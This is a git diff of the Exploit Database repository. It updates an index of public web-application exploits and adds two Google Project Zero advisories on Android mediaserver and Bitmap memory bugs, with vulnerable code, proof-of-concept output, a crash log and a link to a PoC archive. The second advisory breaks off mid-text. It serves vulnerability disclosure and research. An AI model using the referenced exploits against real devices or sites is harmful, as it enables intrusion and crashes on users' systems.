- Dir_Plugins Parameter Multiple Remote File Inclusion",2006-08-17,Drago84,php,webapps,0 -28403,platforms/php/webapps/28403.txt,"Mambo Component 'lmtg_myhomepage' 1.2 - Multiple Remote File Inclusion",2006-08-18,O.U.T.L.A.W,php,webapps,0 -28404,platforms/php/webapps/28404.txt,"Mambo Component 'com_rssxt' 1.0 - 'MosConfig_absolute_path' Parameter Multiple Remote File Inclusion",2006-08-18,Crackers_Child,php,webapps,0 +28403,platforms/php/webapps/28403.txt,"Mambo Component LMTG Myhomepage 1.2 - Multiple Remote File Inclusion",2006-08-18,O.U.T.L.A.W,php,webapps,0 +28404,platforms/php/webapps/28404.txt,"Mambo Component Rssxt 1.0 - 'MosConfig_absolute_path' Parameter Multiple Remote File Inclusion",2006-08-18,Crackers_Child,php,webapps,0 28406,platforms/php/webapps/28406.txt,"XennoBB 1.0.x/2.2 - Icon_Topic SQL Injection",2006-08-19,"Chris Boulton",php,webapps,0 28409,platforms/php/webapps/28409.txt,"Vtiger CRM 5.4.0 - (index.php onlyforuser Parameter) SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0 -28410,platforms/php/webapps/28410.txt,"Mambo Component 'com_admin-copy_module' - 'MosConfig_absolute_path' Parameter Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0 +28410,platforms/php/webapps/28410.txt,"Mambo Component Display MOSBot Manager - 'MosConfig_absolute_path' Parameter Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0 28411,platforms/php/webapps/28411.txt,"DieselScripts Job Site - Forgot.php Multiple Cross-Site Scripting Vulnerabilities",2006-08-21,night_warrior771,php,webapps,0 28412,platforms/php/webapps/28412.txt,"DieselScripts DieselPay - 'index.php' Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps,0 28413,platforms/php/webapps/28413.txt,"cPanel 10.x - dohtaccess.html dir Parameter Cross-Site Scripting",2006-08-21,preth00nker,php,webapps,0 @@ -29652,7 +29659,7 @@ id,file,description,date,author,platform,type,port 28434,platforms/php/webapps/28434.txt,"BigACE 1.8.2 - 'download.cmd.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 28435,platforms/php/webapps/28435.txt,"BigACE 1.8.2 - 'admin.cmd.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 28436,platforms/php/webapps/28436.txt,"Alstrasoft Video Share Enterprise 4.x - MyajaxPHP.php Remote File Inclusion",2006-08-26,night_warrior771,php,webapps,0 -28437,platforms/php/webapps/28437.txt,"Joomla! / Mambo Component 'com_comprofiler' 1.0 - 'class.php' Remote File Inclusion",2006-08-26,Matdhule,php,webapps,0 +28437,platforms/php/webapps/28437.txt,"Joomla! / Mambo Component Comprofiler 1.0 - 'class.php' Remote File Inclusion",2006-08-26,Matdhule,php,webapps,0 28439,platforms/php/webapps/28439.txt,"HLstats 1.34 - hlstats.php Cross-Site Scripting",2006-08-29,kefka,php,webapps,0 28440,platforms/php/webapps/28440.txt,"ModuleBased CMS - Multiple Remote File Inclusion",2006-08-29,sCORPINo,php,webapps,0 28441,platforms/php/webapps/28441.txt,"IwebNegar 1.1 - comments.php SQL Injection",2006-08-30,Hessam-x,php,webapps,0 @@ -31506,15 +31513,15 @@ id,file,description,date,author,platform,type,port 31202,platforms/php/webapps/31202.txt,"PlutoStatus Locator 1.0pre alpha - 'index.php' Local File Inclusion",2008-02-14,muuratsalo,php,webapps,0 31206,platforms/php/webapps/31206.txt,"Joomla! / Mambo Component 'com_smslist' - 'listid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 31207,platforms/php/webapps/31207.txt,"Joomla! / Mambo Component 'com_activities' - 'id' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 -31208,platforms/php/webapps/31208.txt,"Joomla! / Mambo Component 'com_sg' - 'pid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 +31208,platforms/php/webapps/31208.txt,"Joomla! / Mambo Component com_sg - 'pid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 31209,platforms/php/webapps/31209.txt,"Joomla! / Mambo Component faq - 'catid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 31210,platforms/php/webapps/31210.txt,"Yellow Swordfish Simple Forum 1.10/1.11 - 'topic' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 31211,platforms/php/webapps/31211.txt,"Yellow Swordfish Simple Forum 1.7/1.9 - 'index.php' SQL Injection",2008-02-15,S@BUN,php,webapps,0 31212,platforms/php/webapps/31212.txt,"Yellow Swordfish Simple Forum 1.x - 'topic' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 -31213,platforms/php/webapps/31213.txt,"Joomla! / Mambo Component 'com_salesrep' - 'rid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 +31213,platforms/php/webapps/31213.txt,"Joomla! / Mambo Component com_salesrep - 'rid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 31214,platforms/php/webapps/31214.txt,"Joomla! / Mambo Component 'com_lexikon' - 'id' Parameter SQL Injection",2008-02-16,S@BUN,php,webapps,0 -31215,platforms/php/webapps/31215.txt,"Joomla! / Mambo Component 'com_filebase' - 'filecatid' Parameter SQL Injection",2008-02-16,S@BUN,php,webapps,0 -31216,platforms/php/webapps/31216.txt,"Joomla! / Mambo Component 'com_scheduling' - 'id' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 +31215,platforms/php/webapps/31215.txt,"Joomla! / Mambo Component Filebase - 'filecatid' Parameter SQL Injection",2008-02-16,S@BUN,php,webapps,0 +31216,platforms/php/webapps/31216.txt,"Joomla! / Mambo Component com_scheduling - 'id' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 31217,platforms/php/webapps/31217.txt,"BanPro Dms 1.0 - 'index.php' Local File Inclusion",2008-02-16,muuratsalo,php,webapps,0 32241,platforms/php/webapps/32241.txt,"PHP Realty - 'dpage.php' SQL Injection",2008-08-13,CraCkEr,php,webapps,0 32242,platforms/php/webapps/32242.txt,"PHP-Fusion 4.01 - 'readmore.php' SQL Injection",2008-08-13,Rake,php,webapps,0 @@ -31524,7 +31531,7 @@ id,file,description,date,author,platform,type,port 32246,platforms/php/webapps/32246.txt,"Nortel Networks SRG V16 - admin_modules.php module Parameter Traversal Local File Inclusion",2008-08-13,CraCkEr,php,webapps,0 32247,platforms/php/webapps/32247.txt,"Nortel Networks SRG V16 - modules.php module Parameter Traversal Local File Inclusion",2008-08-13,CraCkEr,php,webapps,0 31221,platforms/windows/webapps/31221.txt,"Ability Mail Server 2013 - Cross-Site Request Forgery (via Persistent Cross-Site Scripting) (Password Reset)",2014-01-27,"David Um",windows,webapps,0 -31224,platforms/php/webapps/31224.txt,"Joomla! / Mambo Component 'com_profile' - 'oid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 +31224,platforms/php/webapps/31224.txt,"Joomla! / Mambo Component com_profile - 'oid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 31225,platforms/php/webapps/31225.html,"RunCMS 1.6.1 - 'admin.php' Cross-Site Scripting",2008-02-18,NBBN,php,webapps,0 31226,platforms/php/webapps/31226.txt,"Joomla! / Mambo Component 'com_detail' - 'id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0 31227,platforms/php/webapps/31227.txt,"Yellow Swordfish Simple Forum 1.x - 'sf-profile.php' SQL Injection",2008-02-18,S@BUN,php,webapps,0 @@ -31668,7 +31675,7 @@ id,file,description,date,author,platform,type,port 31445,platforms/jsp/webapps/31445.txt,"Elastic Path 4.1 - 'manager/getImportFileRedirect.jsp' file Parameter Traversal Arbitrary File Access",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 31446,platforms/jsp/webapps/31446.txt,"Elastic Path 4.1 - 'manager/FileManager.jsp' dir Variable Traversal Arbitrary Directory Listing",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 31447,platforms/php/webapps/31447.txt,"News-Template 0.5beta - 'print.php' Multiple Cross-Site Scripting Vulnerabilities",2008-03-20,ZoRLu,php,webapps,0 -31448,platforms/php/webapps/31448.txt,"Joomla! / Mambo Component 'com_datsogallery' 1.3.1 - 'id' Parameter SQL Injection",2008-03-20,Cr@zy_King,php,webapps,0 +31448,platforms/php/webapps/31448.txt,"Joomla! / Mambo Component Datsogallery 1.3.1 - 'id' Parameter SQL Injection",2008-03-20,Cr@zy_King,php,webapps,0 31449,platforms/php/webapps/31449.txt,"W-Agora 4.0 - add_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 31450,platforms/php/webapps/31450.txt,"W-Agora 4.0 - create_forum.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 31451,platforms/php/webapps/31451.txt,"W-Agora 4.0 - create_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 @@ -32415,8 +32422,8 @@ id,file,description,date,author,platform,type,port 32620,platforms/ios/webapps/32620.txt,"Vanctech File Commander 1.1 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,ios,webapps,8080 32622,platforms/php/webapps/32622.txt,"WordPress Plugin Ajax Pagination 1.1 - Local File Inclusion",2014-03-31,"Glyn Wintle",php,webapps,80 32623,platforms/multiple/webapps/32623.txt,"EMC Cloud Tiering Appliance 10.0 - Unauthenticated XXE Arbitrary File Read (Metasploit)",2014-03-31,"Brandon Perry",multiple,webapps,0 -32624,platforms/php/webapps/32624.txt,"PHP JOBWEBSITE PRO - siteadmin/forgot.php adname Parameter SQL Injection",2008-12-01,Pouya_Server,php,webapps,0 -32625,platforms/php/webapps/32625.txt,"PHP JOBWEBSITE PRO - siteadmin/forgot.php Multiple Parameter Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 +32624,platforms/php/webapps/32624.txt,"PHP JOBWEBSITE PRO - 'adname' Parameter SQL Injection",2008-12-01,Pouya_Server,php,webapps,0 +32625,platforms/php/webapps/32625.txt,"PHP JOBWEBSITE PRO - 'forgot.php' Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 32626,platforms/asp/webapps/32626.txt,"ASP Forum Script - messages.asp message_id Parameter SQL Injection",2008-12-01,Pouya_Server,asp,webapps,0 32627,platforms/php/webapps/32627.txt,"ASP Forum Script - new_message.asp forum_id Parameter Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 32628,platforms/asp/webapps/32628.txt,"ASP Forum Script - messages.asp forum_id Parameter Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps,0 @@ -32522,7 +32529,7 @@ id,file,description,date,author,platform,type,port 32803,platforms/php/webapps/32803.txt,"A4Desk Event Calendar - 'eventid' Parameter SQL Injection",2008-10-01,r45c4l,php,webapps,0 32804,platforms/php/webapps/32804.txt,"lastRSS autoposting bot MOD 0.1.3 - 'phpbb_root_path' Parameter Remote File Inclusion",2009-02-20,Kacper,php,webapps,0 32806,platforms/php/webapps/32806.txt,"Blue Utopia - 'index.php' Local File Inclusion",2009-02-22,PLATEN,php,webapps,0 -32807,platforms/php/webapps/32807.txt,"Joomla! / Mambo Component 'com_gigcal' 1.0 - 'banddetails.php' SQL Injection",2009-02-23,"Salvatore Fresta",php,webapps,0 +32807,platforms/php/webapps/32807.txt,"Joomla! / Mambo Component gigCalendar 1.0 - 'banddetails.php' SQL Injection",2009-02-23,"Salvatore Fresta",php,webapps,0 32808,platforms/php/webapps/32808.txt,"Magento 1.2 - app/code/core/Mage/Admin/Model/Session.php login['Username'] Parameter Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0 32809,platforms/php/webapps/32809.txt,"Magento 1.2 - app/code/core/Mage/Adminhtml/controllers/IndexController.php email Parameter Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0 32810,platforms/php/webapps/32810.txt,"Magento 1.2 - downloader/index.php URL Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0 @@ -32838,7 +32845,7 @@ id,file,description,date,author,platform,type,port 33446,platforms/php/webapps/33446.txt,"Barbo91 - 'upload.php' Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 33447,platforms/php/webapps/33447.php,"FreeWebShop 2.2.9 R2 - Multiple Remote Vulnerabilities",2009-12-29,"Akita Software Security",php,webapps,0 33448,platforms/php/webapps/33448.txt,"AzDGDatingMedium 1.9.3 - 'l' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-12-29,indoushka,php,webapps,0 -33449,platforms/php/webapps/33449.txt,"Conkurent PHPMyCart 1.3 - Cross-Site Scripting / Authentication Bypass",2009-12-31,indoushka,php,webapps,0 +33449,platforms/php/webapps/33449.txt,"PHPMyCart 1.3 - Cross-Site Scripting / Authentication Bypass",2009-12-31,indoushka,php,webapps,0 33450,platforms/php/webapps/33450.txt,"SendStudio 4.0.1 - Cross-Site Scripting / Security Bypass",2009-12-31,indoushka,php,webapps,0 33451,platforms/php/webapps/33451.txt,"BosClassifieds 1.20 - 'recent.php' Cross-Site Scripting",2009-12-31,indoushka,php,webapps,0 33452,platforms/php/webapps/33452.txt,"Imagevue r16 - 'amount' Parameter Cross-Site Scripting",2009-12-31,indoushka,php,webapps,0 @@ -34225,7 +34232,7 @@ id,file,description,date,author,platform,type,port 35758,platforms/asp/webapps/35758.txt,"Mitel Audio and Web Conferencing 4.4.3.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-16,"Richard Brain",asp,webapps,0 35750,platforms/hardware/webapps/35750.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Exploit DnsProxy.cmd",2015-01-11,"XLabs Security",hardware,webapps,0 35751,platforms/hardware/webapps/35751.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Exploit Lancfg2get.cgi",2015-01-11,"XLabs Security",hardware,webapps,0 -35752,platforms/php/webapps/35752.txt,"Mambo Component 'com_docman' 1.3.0 - Multiple SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0 +35752,platforms/php/webapps/35752.txt,"Mambo Component Docman 1.3.0 - Multiple SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0 35754,platforms/php/webapps/35754.txt,"allocPSA 1.7.4 - 'login/login.php' Cross-Site Scripting",2011-05-16,"AutoSec Tools",php,webapps,0 35755,platforms/php/webapps/35755.txt,"DocMGR 1.1.2 - 'history.php' Cross-Site Scripting",2011-05-12,"AutoSec Tools",php,webapps,0 35756,platforms/php/webapps/35756.txt,"openQRM 4.8 - 'source_tab' Parameter Cross-Site Scripting",2011-05-16,"AutoSec Tools",php,webapps,0 @@ -34428,16 +34435,16 @@ id,file,description,date,author,platform,type,port 36094,platforms/php/webapps/36094.txt,"TinyWebGallery 1.8.4 - Local File Inclusion / SQL Injection",2011-08-31,KedAns-Dz,php,webapps,0 36095,platforms/php/webapps/36095.txt,"S9Y Serendipity 1.5.1 - 'research_display.php' SQL Injection",2011-08-31,The_Exploited,php,webapps,0 36096,platforms/php/webapps/36096.txt,"Web Professional - 'default.php' SQL Injection",2011-08-31,The_Exploited,php,webapps,0 -36097,platforms/php/webapps/36097.txt,"Mambo Component 'com_n-skyrslur' - Cross-Site Scripting",2011-09-02,CoBRa_21,php,webapps,0 +36097,platforms/php/webapps/36097.txt,"Mambo Component N-Skyrslur - Cross-Site Scripting",2011-09-02,CoBRa_21,php,webapps,0 36098,platforms/php/webapps/36098.html,"Guppy CMS 5.0.9 / 5.00.10 - Authentication Bypass/Change Email",2015-02-17,"Brandon Murphy",php,webapps,80 36099,platforms/php/webapps/36099.html,"GuppY CMS 5.0.9 < 5.00.10 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-02-17,"Brandon Murphy",php,webapps,80 -36102,platforms/php/webapps/36102.txt,"Mambo Component 'com_n-gallery' - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 +36102,platforms/php/webapps/36102.txt,"Mambo Component N-Gallery - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 36103,platforms/php/webapps/36103.txt,"Mambo Component Ahsshop - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 36105,platforms/hardware/webapps/36105.sh,"D-Link DSL-2640B - Unauthenticated Remote DNS Change",2015-02-18,"Todor Donev",hardware,webapps,0 -36106,platforms/php/webapps/36106.txt,"Mambo Component 'com_n-press' - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 +36106,platforms/php/webapps/36106.txt,"Mambo Component N-Press - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 36107,platforms/php/webapps/36107.txt,"KaiBB 2.0.1 - SQL Injection / Arbitrary File Upload",2011-09-02,KedAns-Dz,php,webapps,0 -36108,platforms/php/webapps/36108.txt,"Mambo Component 'com_n-frettir' - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 -36109,platforms/php/webapps/36109.txt,"Mambo Component 'com_n-myndir' - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 +36108,platforms/php/webapps/36108.txt,"Mambo Component N-Frettir - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 +36109,platforms/php/webapps/36109.txt,"Mambo Component N-Myndir - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 36110,platforms/php/webapps/36110.txt,"ACal 2.2.6 - 'calendar.php' Cross-Site Scripting",2011-09-02,T0xic,php,webapps,0 36112,platforms/php/webapps/36112.txt,"Wordpress Plugin Duplicator 0.5.8 - Privilege Escalation",2015-02-18,"Kacper Szurek",php,webapps,80 36113,platforms/php/webapps/36113.txt,"Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting",2011-09-05,R3d-D3V!L,php,webapps,0 @@ -35802,7 +35809,7 @@ id,file,description,date,author,platform,type,port 38304,platforms/php/webapps/38304.py,"SMF (Simple Machine Forum) 2.0.10 - Remote Memory Exfiltration Exploit",2015-09-24,"Filippo Roncari",php,webapps,0 38309,platforms/php/webapps/38309.txt,"osCommerce - Cross-Site Request Forgery",2013-02-12,"Jakub Galczyk",php,webapps,0 38311,platforms/php/webapps/38311.txt,"BlackNova Traders - 'news.php' SQL Injection",2013-02-12,ITTIHACK,php,webapps,0 -38312,platforms/php/webapps/38312.txt,"AbanteCart - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2013-02-14,LiquidWorm,php,webapps,0 +40882,platforms/php/webapps/40882.txt,"Edge SkateShop - Authentication bypass",2016-12-06,Delilah,php,webapps,0 38314,platforms/php/webapps/38314.txt,"WordPress Plugin NextGEN Gallery - Full Path Disclosure",2013-02-14,"Henrique Montenegro",php,webapps,0 38315,platforms/php/webapps/38315.txt,"Sonar - Multiple Cross-Site Scripting Vulnerabilities",2013-02-12,DevilTeam,php,webapps,0 38316,platforms/cgi/webapps/38316.txt,"FortiManager 5.2.2 - Persistent Cross-Site Scripting",2015-09-25,hyp3rlinx,cgi,webapps,0 @@ -36850,3 +36857,4 @@ id,file,description,date,author,platform,type,port 40852,platforms/php/webapps/40852.txt,"Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection",2016-09-16,"Larry W. Cashdollar",php,webapps,0 40853,platforms/hardware/webapps/40853.txt,"Xfinity Gateway - Cross-Site Request Forgery",2016-11-30,Pabstersac,hardware,webapps,0 40856,platforms/hardware/webapps/40856.txt,"Xfinity Gateway - Remote Code Execution",2016-12-02,"Gregory Smiley",hardware,webapps,0 +40877,platforms/php/webapps/40877.txt,"AbanteCart 1.2.7 - Cross-Site Scripting",2016-12-06,"Kacper Szurek",php,webapps,0 diff --git a/platforms/android/dos/40876.txt b/platforms/android/dos/40876.txt new file mode 100755 index 000000000..e2c1ab0af --- /dev/null +++ b/platforms/android/dos/40876.txt @@ -0,0 +1,169 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=932 + +The code in IOMXNodeInstance.cpp that handles enableNativeBuffers uses port_index without validation, leading to writing the dword value 0 or 1 at an attacker controlled offset from the IOMXNodeInstance structure. + +The vulnerable code is here (every write to mSecureBufferType): + +status_t OMXNodeInstance::enableNativeBuffers( + OMX_U32 portIndex, OMX_BOOL graphic, OMX_BOOL enable) { + Mutex::Autolock autoLock(mLock); + CLOG_CONFIG(enableNativeBuffers, "%s:%u%s, %d", portString(portIndex), portIndex, + graphic ? ", graphic" : "", enable); + OMX_STRING name = const_cast( + graphic ? "OMX.google.android.index.enableAndroidNativeBuffers" + : "OMX.google.android.index.allocateNativeHandle"); + + OMX_INDEXTYPE index; + OMX_ERRORTYPE err = OMX_GetExtensionIndex(mHandle, name, &index); + + if (err == OMX_ErrorNone) { + EnableAndroidNativeBuffersParams params; + InitOMXParams(¶ms); + params.nPortIndex = portIndex; + params.enable = enable; + + err = OMX_SetParameter(mHandle, index, ¶ms); + CLOG_IF_ERROR(setParameter, err, "%s(%#x): %s:%u en=%d", name, index, + portString(portIndex), portIndex, enable); + if (!graphic) { + if (err == OMX_ErrorNone) { + mSecureBufferType[portIndex] = + enable ? kSecureBufferTypeNativeHandle : kSecureBufferTypeOpaque; + } else if (mSecureBufferType[portIndex] == kSecureBufferTypeUnknown) { + mSecureBufferType[portIndex] = kSecureBufferTypeOpaque; + } + } + } else { + CLOG_ERROR_IF(enable, getExtensionIndex, err, "%s", name); + if (!graphic) { + // Extension not supported, check for manual override with system property + // This is a temporary workaround until partners support the OMX extension + char value[PROPERTY_VALUE_MAX]; + if (property_get("media.mediadrmservice.enable", value, NULL) + && (!strcmp("1", value) || !strcasecmp("true", value))) { + CLOG_CONFIG(enableNativeBuffers, "system property override: using native-handles"); + mSecureBufferType[portIndex] = kSecureBufferTypeNativeHandle; + } else if (mSecureBufferType[portIndex] == kSecureBufferTypeUnknown) { + mSecureBufferType[portIndex] = kSecureBufferTypeOpaque; + } + err = OMX_ErrorNone; + } + } + + return StatusFromOMXError(err); +} + +This code is reached from the binder interface android.hardware.IOMX in the mediaserver process; via the following code in IOMX.cpp which reads the port_index directly from the incoming parcel without any validation. + + case ENABLE_NATIVE_BUFFERS: + { + CHECK_OMX_INTERFACE(IOMX, data, reply); + + node_id node = (node_id)data.readInt32(); + OMX_U32 port_index = data.readInt32(); + OMX_BOOL graphic = (OMX_BOOL)data.readInt32(); + OMX_BOOL enable = (OMX_BOOL)data.readInt32(); + + status_t err = enableNativeBuffers(node, port_index, graphic, enable); + reply->writeInt32(err); + + return NO_ERROR; + } + +Running the attached proof-of-concept on a Nexus 5x yields the following output: + +--- binder OMX index-out-of-bounds --- +[0] opening /dev/binder +[0] looking up media.player +0000: 00 . 01 . 00 . 00 . 1a . 00 . 00 . 00 . 61 a 00 . 6e n 00 . 64 d 00 . 72 r 00 . +0016: 6f o 00 . 69 i 00 . 64 d 00 . 2e . 00 . 6f o 00 . 73 s 00 . 2e . 00 . 49 I 00 . +0032: 53 S 00 . 65 e 00 . 72 r 00 . 76 v 00 . 69 i 00 . 63 c 00 . 65 e 00 . 4d M 00 . +0048: 61 a 00 . 6e n 00 . 61 a 00 . 67 g 00 . 65 e 00 . 72 r 00 . 00 . 00 . 00 . 00 . +0064: 0c . 00 . 00 . 00 . 6d m 00 . 65 e 00 . 64 d 00 . 69 i 00 . 61 a 00 . 2e . 00 . +0080: 70 p 00 . 6c l 00 . 61 a 00 . 79 y 00 . 65 e 00 . 72 r 00 . 00 . 00 . 00 . 00 . +BR_NOOP: +BR_TRANSACTION_COMPLETE: +BR_REPLY: + target 0000000000000000 cookie 0000000000000000 code 00000000 flags 00000000 + pid 0 uid 1000 data 24 offs 8 +0000: 85 . 2a * 68 h 73 s 7f . 01 . 00 . 00 . 01 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . +0016: 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . + - type 73682a85 flags 0000017f ptr 0000000000000001 cookie 0000000000000000 +[0] got handle 00000001 +[0] creating an OMX +0000: 00 . 01 . 00 . 00 . 21 ! 00 . 00 . 00 . 61 a 00 . 6e n 00 . 64 d 00 . 72 r 00 . +0016: 6f o 00 . 69 i 00 . 64 d 00 . 2e . 00 . 6d m 00 . 65 e 00 . 64 d 00 . 69 i 00 . +0032: 61 a 00 . 2e . 00 . 49 I 00 . 4d M 00 . 65 e 00 . 64 d 00 . 69 i 00 . 61 a 00 . +0048: 50 P 00 . 6c l 00 . 61 a 00 . 79 y 00 . 65 e 00 . 72 r 00 . 53 S 00 . 65 e 00 . +0064: 72 r 00 . 76 v 00 . 69 i 00 . 63 c 00 . 65 e 00 . 00 . 00 . +BR_NOOP: +BR_TRANSACTION_COMPLETE: +BR_REPLY: + target 0000000000000000 cookie 0000000000000000 code 00000000 flags 00000000 + pid 0 uid 1013 data 24 offs 8 +0000: 85 . 2a * 68 h 73 s 7f . 01 . 00 . 00 . 02 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . +0016: 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . + - type 73682a85 flags 0000017f ptr 0000000000000002 cookie 0000000000000000 +[0] got handle 00000002 +[0] creating node +0000: 00 . 01 . 00 . 00 . 15 . 00 . 00 . 00 . 61 a 00 . 6e n 00 . 64 d 00 . 72 r 00 . +0016: 6f o 00 . 69 i 00 . 64 d 00 . 2e . 00 . 68 h 00 . 61 a 00 . 72 r 00 . 64 d 00 . +0032: 77 w 00 . 61 a 00 . 72 r 00 . 65 e 00 . 2e . 00 . 49 I 00 . 4f O 00 . 4d M 00 . +0048: 58 X 00 . 00 . 00 . 4f O 4d M 58 X 2e . 67 g 6f o 6f o 67 g 6c l 65 e 2e . 67 g +0064: 73 s 6d m 2e . 64 d 65 e 63 c 6f o 64 d 65 e 72 r 00 . 00 . 85 . 2a * 62 b 73 s +0080: 7f . 01 . 00 . 00 . 41 A 41 A 41 A 41 A 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . +0096: 00 . 00 . 00 . 00 . +BR_NOOP: +BR_INCREFS: + 0x7fe5862df8, 0x7fe5862e00 +BR_ACQUIRE: + 0x7fe5862e0c, 0x7fe5862e14 +BR_TRANSACTION_COMPLETE: +BR_NOOP: +BR_REPLY: + target 0000000000000000 cookie 0000000000000000 code 00000000 flags 00000000 + pid 0 uid 1013 data 8 offs 0 +0000: 00 . 00 . 00 . 00 . 03 . 00 . 1e . 1d . +[0] got node 1d1e0003 +[0] triggering bug +0000: 00 . 01 . 00 . 00 . 15 . 00 . 00 . 00 . 61 a 00 . 6e n 00 . 64 d 00 . 72 r 00 . +0016: 6f o 00 . 69 i 00 . 64 d 00 . 2e . 00 . 68 h 00 . 61 a 00 . 72 r 00 . 64 d 00 . +0032: 77 w 00 . 61 a 00 . 72 r 00 . 65 e 00 . 2e . 00 . 49 I 00 . 4f O 00 . 4d M 00 . +0048: 58 X 00 . 00 . 00 . 03 . 00 . 1e . 1d . ba . 43 C 46 F 60 ` 00 . 00 . 00 . 00 . +0064: 00 . 00 . 00 . 00 . +BR_NOOP: +BR_TRANSACTION_COMPLETE: +BR_NOOP: +BR_DEAD_REPLY: + +And a corresponding crash in the mediaserver process: + +*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** +Build fingerprint: 'google/bullhead/bullhead:7.0/NRD91E/3234993:userdebug/dev-keys' +Revision: 'rev_1.0' +ABI: 'arm' +pid: 7454, tid: 7457, name: Binder:7454_1 >>> /system/bin/mediaserver <<< +signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x6a9e0014 + r0 6a9dffa8 r1 ea8e757c r2 ea43aa1a r3 0000000f + r4 e984f0c0 r5 8000101a r6 00000000 r7 ea43a981 + r8 604643ba r9 00000000 sl ea451f61 fp 00000000 + ip ea012658 sp e81d5660 lr e9faa527 pc ea42d834 cpsr 60030030 + +backtrace: + #00 pc 0001c834 /system/lib/libstagefright_omx.so (_ZN7android15OMXNodeInstance19enableNativeBuffersEj8OMX_BOOLS1_+131) + #01 pc 0009b8fb /system/lib/libmedia.so (_ZN7android5BnOMX10onTransactEjRKNS_6ParcelEPS1_j+3626) + #02 pc 000359c3 /system/lib/libbinder.so (_ZN7android7BBinder8transactEjRKNS_6ParcelEPS1_j+70) + #03 pc 0003d1bb /system/lib/libbinder.so (_ZN7android14IPCThreadState14executeCommandEi+702) + #04 pc 0003ce07 /system/lib/libbinder.so (_ZN7android14IPCThreadState20getAndExecuteCommandEv+114) + #05 pc 0003d31b /system/lib/libbinder.so (_ZN7android14IPCThreadState14joinThreadPoolEb+46) + #06 pc 0004f765 /system/lib/libbinder.so + #07 pc 0000e349 /system/lib/libutils.so (_ZN7android6Thread11_threadLoopEPv+140) + #08 pc 00047003 /system/lib/libc.so (_ZL15__pthread_startPv+22) + #09 pc 00019e1d /system/lib/libc.so (__start_thread+6) + +Fixed in the November security bulletin at https://source.android.com/security/bulletin/2016-11-01.html + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40876.zip + diff --git a/platforms/android/remote/40874.txt b/platforms/android/remote/40874.txt new file mode 100755 index 000000000..b311e8082 --- /dev/null +++ b/platforms/android/remote/40874.txt @@ -0,0 +1,91 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=928 + +Bitmap objects can be passed between processes by flattening them to a Parcel in one process and un-flattening them in another. In order to conserve memory, there exists a code path which allows Bitmaps to be shared between processes by providing an ashmem-mapped file descriptor containing the Bitmap's raw pixel data. + +The android.graphics.Bitmap class illegally assumes that the size of the ashmem region provided by the user matches the actual underlying size of the Bitmap. + +When un-flattening a Bitmap from a Parcel, the class first calculates the assumed size of the Bitmap from the user-provided dimensions. Then, it calls Parcel::readBlob in order to map the given ashmem file descriptor to the process's VAS. This mapping is done using the size calculated from the Bitmap's dimensions (and not the size of the underlying ashmem descriptor). + +Later, the Bitmap constructor internally stores the ashmem file descriptor and mapped memory address, along with the size of the mapping. However, instead of using the same calculated size which was used when mapping the shared memory region, 